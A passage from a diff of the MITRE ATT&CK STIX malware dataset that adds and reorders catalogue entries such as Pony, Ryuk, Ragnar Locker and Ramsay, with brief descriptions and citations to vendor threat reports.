+ },
+ {
+ "id": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "name": "Pony",
+ "description": "[Pony](https://attack.mitre.org/software/S0453) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0453",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0453"
+ },
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-25T21:57:40.642Z",
+ "created": "2020-05-21T21:03:35.244Z",
"x_mitre_contributors": [
- "Darren Spruell"
+ "Arie Olshtein, Check Point",
+ "Kobi Eisenkraft, Check Point"
],
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Pony"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3",
@@ -198509,13 +227849,52 @@
],
"modified": "2020-03-30T17:22:08.256Z",
"created": "2017-05-31T21:33:19.746Z",
+ "x_mitre_version": "1.2",
+ "x_mitre_aliases": [
+ "PowerDuke"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "id": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "name": "PowerShower",
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) is a PowerShell backdoor used by [Inception](https://attack.mitre.org/groups/G0100) for initial reconnaissance and to download and execute second stage payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0441",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0441"
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-20T20:43:49.960Z",
+ "created": "2020-05-08T19:27:12.414Z",
"x_mitre_platforms": [
"Windows"
],
"x_mitre_aliases": [
- "PowerDuke"
+ "PowerShower"
],
- "x_mitre_version": "1.2"
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -198543,15 +227922,21 @@
],
"modified": "2020-03-30T17:22:45.321Z",
"created": "2019-06-21T17:23:27.855Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"PowerStallion"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2017-05-31T21:33:07.943Z",
+ "modified": "2020-03-30T02:39:23.582Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -198571,19 +227956,13 @@
"name": "Prikormka",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--37cc7eb6-12e3-467b-82e8-f20f2cc73c69",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-30T02:39:23.582Z",
- "created": "2017-05-31T21:33:07.943Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Prikormka"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -198613,15 +227992,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T02:40:30.618Z",
+ "modified": "2020-06-12T17:37:53.480Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Proton"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"object_marking_refs": [
@@ -198653,16 +228032,16 @@
],
"modified": "2020-03-30T17:23:20.589Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_contributors": [
- "Edward Millington"
+ "x_mitre_version": "1.2",
+ "x_mitre_aliases": [
+ "Proxysvc"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_aliases": [
- "Proxysvc"
- ],
- "x_mitre_version": "1.2"
+ "x_mitre_contributors": [
+ "Edward Millington"
+ ]
},
{
"id": "malware--dfb5fa9b-3051-4b97-8035-08f80aef945b",
@@ -198690,13 +228069,13 @@
],
"modified": "2020-03-30T17:23:59.127Z",
"created": "2017-05-31T21:32:53.268Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Psylo"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--5f9f7648-04ba-4a9f-bb4c-2a13e74572bd",
@@ -198711,7 +228090,7 @@
},
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -198722,15 +228101,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-28T21:38:16.382Z",
+ "modified": "2020-06-22T17:54:15.287Z",
"created": "2017-05-31T21:33:26.084Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Pteranodon"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -198762,13 +228141,13 @@
],
"modified": "2020-03-28T21:38:43.793Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"QUADAGENT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--8c553311-0baa-4146-997a-f79acef3d831",
@@ -198796,13 +228175,13 @@
],
"modified": "2020-03-30T17:24:58.616Z",
"created": "2017-05-31T21:32:38.480Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RARSTONE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c",
@@ -198834,15 +228213,21 @@
],
"modified": "2020-03-30T17:25:28.458Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RATANKBA"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2019-10-11T16:13:19.588Z",
+ "modified": "2019-10-16T15:34:22.990Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"id": "malware--065196de-d7e8-4888-acfb-b2134022ba1b",
"name": "RDFSNIFFER",
"description": "[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)",
@@ -198862,19 +228247,13 @@
"description": "Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators\u2019 New Tools and Techniques. Retrieved October 11, 2019."
}
],
- "type": "malware",
- "labels": [
- "malware"
+ "x_mitre_platforms": [
+ "Windows"
],
- "modified": "2019-10-16T15:34:22.990Z",
- "created": "2019-10-11T16:13:19.588Z",
- "x_mitre_version": "1.0",
"x_mitre_aliases": [
"RDFSNIFFER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.0"
},
{
"id": "malware--b9eec47e-98f4-4b3c-b574-3fa8a87ebe05",
@@ -198906,13 +228285,13 @@
],
"modified": "2020-03-30T17:26:05.875Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RGDoor"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--ad4f146f-e3ec-444a-ba71-24bffd7f0f8e",
@@ -198940,13 +228319,13 @@
],
"modified": "2020-03-30T17:28:04.217Z",
"created": "2017-05-31T21:32:11.911Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RIPTIDE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -198974,13 +228353,13 @@
],
"modified": "2020-03-30T17:39:16.351Z",
"created": "2017-05-31T21:33:07.565Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"ROCKBOOT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
@@ -199003,9 +228382,9 @@
"source_name": "Talos ROKRAT"
},
{
- "source_name": "Talos Group123",
+ "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
"description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.",
- "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
+ "source_name": "Talos Group123"
},
{
"url": "https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
@@ -199020,45 +228399,136 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T17:40:07.686Z",
+ "modified": "2020-05-21T17:07:02.274Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ROKRAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.1"
},
{
+ "created": "2017-05-31T21:33:26.565Z",
+ "modified": "2020-07-03T22:22:05.857Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"id": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "RTM",
- "description": "[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). (Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). Newer versions of the malware have been reported publicly as Redaman.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0148",
"external_id": "S0148"
},
+ {
+ "source_name": "Redaman",
+ "description": "(Citation: Unit42 Redaman January 2019)"
+ },
{
"url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
"source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_aliases": [
+ "RTM",
+ "Redaman"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Arie Olshtein, Check Point",
+ "Kobi Eisenkraft, Check Point"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0481",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0481"
+ },
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ },
+ {
+ "source_name": "Cynet Ragnar Apr 2020",
+ "url": "https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/",
+ "description": "Gold, B. (2020, April 27). Cynet Detection Report: Ragnar Locker Ransomware. Retrieved June 29, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Ragnar Locker",
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) is a ransomware that has been in use since at least December 2019.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)",
+ "id": "malware--54895630-efd2-4608-9c24-319de972a9eb",
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-30T17:40:42.776Z",
- "created": "2017-05-31T21:33:26.565Z",
- "x_mitre_version": "1.1",
+ "modified": "2020-06-30T00:39:39.738Z",
+ "created": "2020-06-29T23:30:53.824Z",
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
- "RTM"
+ "Ragnar Locker"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0458",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0458"
+ },
+ {
+ "source_name": "Ramsay",
+ "description": "(Citation: Eset Ramsay May 2020)"
+ },
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, potentially from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware.(Citation: Eset Ramsay May 2020)",
+ "name": "Ramsay",
+ "id": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-16T23:17:20.639Z",
+ "created": "2020-05-27T16:58:08.242Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Ramsay"
],
"x_mitre_platforms": [
"Windows"
@@ -199131,19 +228601,19 @@
],
"modified": "2020-03-30T03:01:39.526Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_contributors": [
+ "Walker Johnson"
+ ],
"x_mitre_aliases": [
"RawPOS",
"FIENDCRY",
"DUEBREW",
"DRIFTWOOD"
],
- "x_mitre_contributors": [
- "Walker Johnson"
- ],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--65341f30-bec6-4b1d-8abf-1a5620446c29",
@@ -199175,13 +228645,13 @@
],
"modified": "2020-03-30T17:41:10.175Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Reaver"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
@@ -199227,17 +228697,17 @@
],
"modified": "2020-03-30T21:01:05.439Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "RedLeaves",
- "BUGJUICE"
+ "x_mitre_contributors": [
+ "Edward Millington"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Edward Millington"
- ]
+ "x_mitre_aliases": [
+ "RedLeaves",
+ "BUGJUICE"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
@@ -199253,7 +228723,7 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"object_marking_refs": [
@@ -199263,15 +228733,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T17:48:05.793Z",
+ "modified": "2020-06-29T01:54:53.301Z",
"created": "2017-05-31T21:32:17.959Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Regin"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -199299,13 +228769,13 @@
],
"modified": "2020-03-30T18:04:25.880Z",
"created": "2019-04-17T19:18:00.270Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Remexi"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--4e6b9625-bbda-4d96-a652-b3bb45453f26",
@@ -199333,13 +228803,13 @@
],
"modified": "2020-03-31T12:40:01.208Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RemoteCMD"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--69d6f4a9-fcf0-4f51-bca7-597c51ad0bb8",
@@ -199376,15 +228846,15 @@
],
"modified": "2020-03-28T21:41:25.889Z",
"created": "2017-05-31T21:33:12.858Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Remsec",
"Backdoor.Remsec",
"ProjectSauron"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--bdb27a1d-1844-42f1-a0c0-826027ae0326",
@@ -199417,10 +228887,78 @@
],
"modified": "2020-03-30T18:05:10.885Z",
"created": "2019-05-02T01:07:36.780Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Revenge RAT"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0433",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0433"
+ },
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) is a remote access trojan (RAT) that shares numerous code similarities with [HotCroissant](https://attack.mitre.org/software/S0431).(Citation: Carbon Black HotCroissant April 2020)",
+ "name": "Rifdoor",
+ "id": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-08T00:24:24.402Z",
+ "created": "2020-05-05T14:03:11.359Z",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Rifdoor"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0448",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0448"
+ },
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Rising Sun",
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor malware used extensively in Operation [Sharpshooter](https://attack.mitre.org/groups/G0104). The malware has been observed targeting nuclear, defense, energy, and financial services companies across the world. [Rising Sun](https://attack.mitre.org/software/S0448) uses source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018)",
+ "id": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-30T03:13:38.515Z",
+ "created": "2020-05-14T22:29:25.653Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Rising Sun"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -199456,13 +228994,13 @@
],
"modified": "2020-03-30T18:05:52.348Z",
"created": "2019-07-29T14:27:18.204Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"RobbinHood"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--8ec6e3b4-b06d-4805-b6aa-af916acc2122",
@@ -199499,13 +229037,13 @@
],
"modified": "2020-03-30T18:06:39.526Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RogueRobin"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.1"
},
{
"id": "malware--6b616fc1-1505-48e3-8b2c-0d19337bff38",
@@ -199533,13 +229071,13 @@
],
"modified": "2020-03-17T14:52:20.206Z",
"created": "2017-05-31T21:32:58.226Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Rover"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
@@ -199557,9 +229095,9 @@
"description": "(Citation: McAfee Gold Dragon)"
},
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"object_marking_refs": [
@@ -199569,15 +229107,59 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T18:08:03.688Z",
+ "modified": "2020-04-21T23:09:31.043Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RunningRAT"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)",
+ "name": "Ryuk",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0446",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0446"
+ },
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ },
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ },
+ {
+ "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
+ "source_name": "FireEye FIN6 Apr 2019"
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-18T21:37:40.600Z",
+ "created": "2020-05-13T20:14:53.171Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Ryuk"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--66b1dcde-17a0-4c7b-95fa-b08d430c2131",
@@ -199605,13 +229187,52 @@
],
"modified": "2020-03-20T18:28:45.114Z",
"created": "2017-05-31T21:32:55.925Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"S-Type"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "name": "SDBot",
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0461",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0461"
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-17T19:40:20.251Z",
